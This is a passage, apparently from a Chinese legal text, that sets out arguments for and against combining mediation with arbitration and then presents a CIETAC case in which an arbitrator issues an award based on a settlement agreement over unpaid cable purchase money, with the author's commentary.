这种观点反驳了认为仲裁员调解案件会造成职责和角色相混淆的观点,认为仲裁员调解案件是其职责范围内的事情,这样会更方便当事人,更有利于纠纷的解决。
这种观点认为,仲裁与调解相结合是当事人的选择,是基于他们对仲裁员的信任。这种信任关系构成了当事人同意由同一人担任仲裁员和调解员的基础。实行仲裁与调解相结合,是对当事人意愿的尊重。
5、渐进论。
此种观点认为,仲裁中在进行调解时不是在当事人完成陈述后的瞬间就争议作出决定,他形成自己的观点需要一个渐进的过程。仲裁员在调解过程中与当事人会见,谈论自己对有关问题的看法,有助于当事人发现自己在案件中某些方面的弱点,促进相互了解,纠正误解和忽视,从而有利于纠纷的解决。
(二)反对仲裁与调解相结合的理论观点
这种观点认为,仲裁与调解相结合是对自然公正原则或者正当程序原则的侵害。侵害论者认为,仲裁员担任调解员和一方当事人私下会见所获取的信息,使得对方当事人没有机会进行辩论,如果将此信息用于以后的仲裁,在程序上就构成了不能容忍的重大违规。
此说认为,仲裁程序和调解程序是两个完全不同的程序,因为调解员的职能和仲裁员的职能有着本质的不同。调解员的职能是帮助他人作出决定,而仲裁员的职能是由第三人独立作出有约束力的决定。二者职能的混淆会损害调解的效力和仲裁决定的独立性。
此说认为,在调解程序中,当事人及其代理人都可以自由发言,这种无序和自由会让调解员难以控制程序。同时,调解过程中调解员获得的信息的质量也难以保证,它们不是在宣誓的状态下作出的陈述。另外,仲裁员在仲裁程序中使用其在调解阶段获得的材料的可能性也会妨碍当事人畅所欲言,从而对调解不利。
这种观点认为,仲裁与调解相结合必然导致某种形态的调和危险。仲裁员调解失败转而充任仲裁员,他们将会受到当事人之言辞而非证据的影响,他们会考虑只有一方当事人知道而另一方当事人不知道的情况。更严重的是,如果仲裁员在调解过程中接收了当事人提供的材料或探知到了当事人出价之底线,他们在裁决时难免会有实际的偏袒。
案情及处理结果
中国国际经济贸易仲裁委员会(以下简称仲裁委员会)根据申请人北京X通信电缆有限公司清算委员会与被申请人长春市Y通信器材有限责任公司于日签订的《协议书》中的仲裁条款,以及申请人于日向仲裁委员会提出的书面仲裁申请,受理了上述协议书项下的仲裁案。
本案申请人和被申请人签订的《协议书》第6条为仲裁条款。双方在该仲裁条款中约定:“本协议书对双方当事人均有约束力。任何一方均可将本和解协议提交中国国际经济贸易仲裁委员会,请求该会按照现行有效的仲裁规则在北京进行仲裁。各方同意由仲裁委员会主任指定一名独任仲裁员,成立仲裁庭,进行书面审理。仲裁庭有权按照适当的方式快捷地进行仲裁程序,仲裁庭根据本和解协议的内容作出裁决书。仲裁裁决是终局的,对各方当事人均有约束力。”
仲裁委员会秘书局于日向申请人和被申请人分别送达了仲裁通知,通知双方仲裁委员会已受理了本案,并告知双方“根据该《协议书》仲裁条款的规定,本案适用简易仲裁程序。仲裁委员会主任指定王生长为本案独任仲裁员,对本案进行审理。”随仲裁通知,仲裁委员会秘书局向被申请人转寄了申请人提交的仲裁申请书及其附件材料,并向双方寄送了仲裁委员会仲裁规则(日起施行文本,即仲裁委员会的现行仲裁规则)和仲裁员名册各一式一份。
日,本案仲裁庭通过仲裁委员会秘书局向双方寄发了本案审理通知,通知双方,仲裁庭根据《协议书》仲裁条款的约定,决定对本案进行书面审理。同时告知双方,鉴于双方已达成和解协议,并且申请人请求仲裁庭依照和解协议的内容作出裁决书,仲裁庭将就和解协议的合法性进行审查。为此,仲裁庭要求双方在日之前就此提出评论或意见。
日,仲裁委员会收到被申请人发给申请人的一份落款日期为日的传真。在该传真中被申请人称:“仲裁申请书收到,本公司同意仲裁申请书中所列条款。”申请人在仲裁庭规定的期限内就和解协议的合法性问题没有提出任何异议。
仲裁庭经过书面审理,认为本案事实清楚,责任分明,可以依和解协议的内容作出仲裁裁决。
申请人与被申请人于日签订了1996004号《电缆订货合同》、于日签订了编号分别为DJ97-004号和DJ97-006号的《电缆订货合同》(以下合称合同),由申请人向被申请人出售、被申请人向申请人购买市内电话通信电缆。上述合同成立之后,申请人向被申请人提供了合同项下的货物, 但被申请人未能全部履行合同项下的付款义务,尚欠申请人人民币944,284元的货款。为此,经双方协商及中国国际贸易促进委员会/国际商会调解中心调解,就被申请人偿还所欠货款事宜,申请人和被申请人于 日达成和解协议,即本案仲裁的《协议书》。该《协议书》内容如下:
“甲方:北京X通信电缆有限公司清算委员会
乙方:长春市Y通信器材有限责任公司
1、甲方作为北京X通信电缆有限公司与乙方签订的1996004、DJ97-004、DJ97-006号合同的权利、义务的承受人,向乙方主张上述合同项下的权利。对此,乙方不持异议。
2、乙方同意在日前向甲方支付上述合同项下的乙方欠甲方的货款944,284元人民币中的300,000元人民币。
3、乙方同意在日前再向甲方支付300,000元人民币。
4、乙方向甲方完成前述2、3项义务之后,甲方免除其应承担的余下的全部所欠货款及因本争议发生的调解、仲裁费用的支付义务。
5、如乙方未能在上述期限内完成2、3项付款义务,将向甲方承担全部944,284元人民币的支付欠款及调解、仲裁费用之外,还承诺以其位于吉林省长春市XX路的办公楼作为抵押,优先偿还甲方的欠款。
6、本协议书对双方当事人均有约束力。任何一方均可将本和解协议提交中国国际经济贸易仲裁委员会,请求该会按照现行有效的仲裁规则在北京进行仲裁。各方同意由仲裁委员会主任指定一名独任仲裁员,成立仲裁庭,进行书面审理。仲裁庭有权按照适当的方式快捷地进行仲裁程序,仲裁庭根据本和解协议的内容作出裁决书。仲裁裁决是终局的,对各方当事人均有约束力。“
1、请求裁决被申请人于 日前向申请人支付人民币300,000元;
2、请求裁决被申请人于日前向申请人支付人民币300,000元;
3、如被申请人未能在上述期限内完成上述两项付款义务,请求裁决其向申请人承担全部944,284元人民币的支付欠款及调解、仲裁费用之外,还承诺以其位于吉林省长春市XX路的办公楼作为抵押,优先偿还申请人的欠款。
仲裁庭意见
根据仲裁庭书面审理的结果,仲裁庭认为:
1、北京X通信电缆有限公司清算委员会作为北京X通信电缆有限公司的清算组织,依法有权作为北京X通信电缆有限公司对外签订合同的权利义务的概括承受人以及合同争议的诉讼或仲裁主体。被申请人在《协议书》中已明确表示,申请人作为北京X通信电缆有限公司与被申请人签订的本案合同的权利、义务的承受人,有权向被申请人主张本案合同项下的权利。对此,被申请人不持异议。仲裁庭认定,就《协议书》主体而言,申请人和被申请人是适格的。
2、申请人和被申请人之间的《协议书》是双方在仲裁委员会之外达成的和解协议。根据仲裁委员会现行仲裁规则(自日起施行)第44条第4款“当事人在仲裁委员会之外通过调解达成和解协议的,可以凭当事人达成的由仲裁委员会仲裁的仲裁协议和他们的和解协议,请求仲裁委员会指定一名独任仲裁员,按照和解协议的内容作出仲裁裁决”的规定,仲裁庭可以依照和解协议的内容,作出仲裁裁决。仲裁庭认为,在依和解协议内容作出裁决书前,仲裁庭有权并有义务审查和解协议内容是否符合法律规定,以使裁决内容符合社会公共利益。关于《协议书》内容的合法性问题,仲裁庭邀请双方进行评论,双方对和解协议的合法性均无异议;仲裁庭经审理认为,和解协议的内容均属于双方依法有权自由处分的民事权利义务,双方自愿签订该和解协议,其内容合法有效。
仲裁庭根据《仲裁规则》第44条的规定,于 日在北京作出《裁决书》,裁决如下:
1、被申请人应于 日前向申请人支付人民币300,000元;
2、被申请人应于日前再向申请人支付人民币300,000元;
3、如被申请人未能在上述期限内完成1、2项付款义务,被申请人应向申请人承担全部944,284元人民币的支付欠款及调解、仲裁费用,并以其位于吉林省长春市XX路的办公楼作为抵押,优先偿还申请人的欠款。
4、本案仲裁费人民币17,829元,与申请人已向仲裁委员会预缴的等额仲裁费冲抵。如被申请人按照本裁决上述1、2 两项完成付款义务,仲裁费全部由申请人承担;如被申请人未完成本裁决上述1、2 两项付款义务,则仲裁费将全部由被申请人承担,届时,被申请人应向申请人支付人民币17,829元,以补偿申请人为其垫付的仲裁费。
本裁决为终局裁决。
本案是中国国际经济贸易仲裁委员会的第六套《仲裁规则》自日起实施后,运用该《仲裁规则》第44条第4款,成功实现中国模式的“先调解后仲裁”(MED-ARB)方法解决争议的第一起案件。笔者有幸在该仲裁案中担任独任仲裁员审理案件。
在本案中,双方当事人发生争议后,他们本着友好合作的精神,将争议提交给中国国际贸易促进委员会/国际商会调解中心调解。该调解中心按照自己的《调解规则》对案件进行了调解并促成双方当事人达成了和解协议。鉴于和解协议规定的履行期较长,而中国法律尚未对调解机构作出的调解书或当事人达成的和解协议的可执行性作出规定,为了保证和解协议能够得到实际履行,双方注意到了《中国国际经济贸易仲裁委员会仲裁规则》第44条的规定,在和解协议中约定,请求仲裁委员会以简便的方法基于和解协议作出仲裁裁决书,以便取得法律的执行力。
双方的和解在实体上解决了以往较为复杂的债权债务关系,使得遗留给仲裁的事项简单明了。仲裁员面临的主要问题是:(1)如何快速仲裁而又符合《仲裁规则》,以确保裁决的可执行性;(2)双方既然已达成和解,仲裁员是否还要对和解协议进行审理?
关于第一个问题,仲裁委员会依和解协议在仲裁庭的组成方面是及时的。作为仲裁员,笔者认为应当做到程序符合规则规定。为此,仲裁庭行使当事人和规则赋予的权力,通知双方决定书面审理并给予双方合理的发表意见的机会。
关于第二个问题,笔者认为,仲裁员的职责是审理案件,而非是某种协议的“橡皮图章”。尽管仲裁事项简单明了,但仲裁员仍应履行审理之责,对和解协议的主体、内容及其合法性进行审理,慎重行使决定权。第七章第三节的调查结果表明,大多数的仲裁员认为仲裁员应当对和解协议的合法性进行审查。此举实际上也是为了确保和解裁决的可执行性。
